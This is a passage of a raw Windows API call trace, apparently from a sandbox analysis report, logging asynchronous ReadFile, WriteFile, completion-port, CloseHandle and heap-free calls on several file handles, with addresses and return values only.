lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.089] ReadFile (in: hFile=0x1e0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.089] ReadFile (in: hFile=0x198, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.089] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.089] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.089] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.089] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0158.089] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.089] WriteFile (in: hFile=0x1c0, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0158.090] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.090] WriteFile (in: hFile=0x1d8, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020) returned 1 [0158.090] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.090] WriteFile (in: hFile=0x1e0, lpBuffer=0x35a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x35a0020) returned 1 [0158.090] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.090] WriteFile (in: hFile=0x198, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020) returned 1 [0158.090] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.090] CloseHandle (hObject=0x1c0) returned 1 [0158.094] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0158.097] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.097] CloseHandle (hObject=0x1d8) returned 1 [0158.098] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0158.101] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.101] CloseHandle (hObject=0x1e0) returned 1 [0158.111] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x35a0020) returned 1 [0158.114] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.114] CloseHandle (hObject=0x198) returned 1 [0158.117] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0158.119] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.239] ReadFile (in: hFile=0x1e0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3480020) returned 1 [0158.240] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.240] WriteFile (in: hFile=0x1e0, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x151b7, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020) returned 1 [0158.241] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.241] ReadFile (in: hFile=0x1e0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3480020) returned 0x0 [0158.241] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.241] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0158.241] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.241] WriteFile (in: hFile=0x1e0, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020) returned 1 [0158.241] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.241] CloseHandle (hObject=0x1e0) returned 1 [0158.243] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0158.258] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.347] ReadFile (in: hFile=0x198, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0158.482] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.511] ReadFile (in: hFile=0x1a0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0158.511] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.511] ReadFile (in: hFile=0x19c, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 1 [0158.534] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.534] ReadFile (in: hFile=0x1b8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x36c0020) returned 1 [0158.535] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.535] WriteFile (in: hFile=0x198, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x11c6b, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0158.536] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.536] ReadFile (in: hFile=0x1c8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x37e0020) returned 1 [0158.536] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.536] ReadFile (in: hFile=0x1b4, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3900020) returned 1 [0158.536] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.536] WriteFile (in: hFile=0x1a0, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x6d3, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0158.537] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.537] WriteFile (in: hFile=0x19c, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x12f77, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0158.537] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.538] WriteFile (in: hFile=0x1b8, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0x17319, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020) returned 1 [0158.538] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.538] ReadFile (in: hFile=0x198, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0158.538] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.538] WriteFile (in: hFile=0x1c8, lpBuffer=0x37e0124*, nNumberOfBytesToWrite=0xdb01, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x37e0020) returned 1 [0158.539] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.539] WriteFile (in: hFile=0x1b4, lpBuffer=0x3900124*, nNumberOfBytesToWrite=0x8c51, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3900020) returned 1 [0158.539] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.539] ReadFile (in: hFile=0x1a0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0158.539] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.539] ReadFile (in: hFile=0x19c, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 0x0 [0158.539] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.539] ReadFile (in: hFile=0x1b8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0158.539] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.539] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.540] ReadFile (in: hFile=0x1c8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x37e0020) returned 0x0 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.540] ReadFile (in: hFile=0x1b4, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3900020) returned 0x0 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.540] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.540] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.540] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.540] WriteFile (in: hFile=0x198, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.540] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0158.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0158.540] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0158.541] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.541] WriteFile (in: hFile=0x1a0, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0158.541] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.541] WriteFile (in: hFile=0x19c, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0158.541] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.541] WriteFile (in: hFile=0x1b8, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x36c0020) returned 1 [0158.541] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.541] CloseHandle (hObject=0x198) returned 1 [0158.543] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0158.544] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.544] WriteFile (in: hFile=0x1c8, lpBuffer=0x37e0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x37e0020) returned 1 [0158.544] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.544] WriteFile (in: hFile=0x1b4, lpBuffer=0x3900094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3900020 | out: lpBuffer=0x3900094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3900020) returned 1 [0158.544] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.544] CloseHandle (hObject=0x1a0) returned 1 [0158.545] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0158.548] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0158.548] CloseHandle (hObject=0x19c) returned 1 [0158.549] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0158.552] GetQueuedCompletionStatus (in: CompletionPort=0xd8, 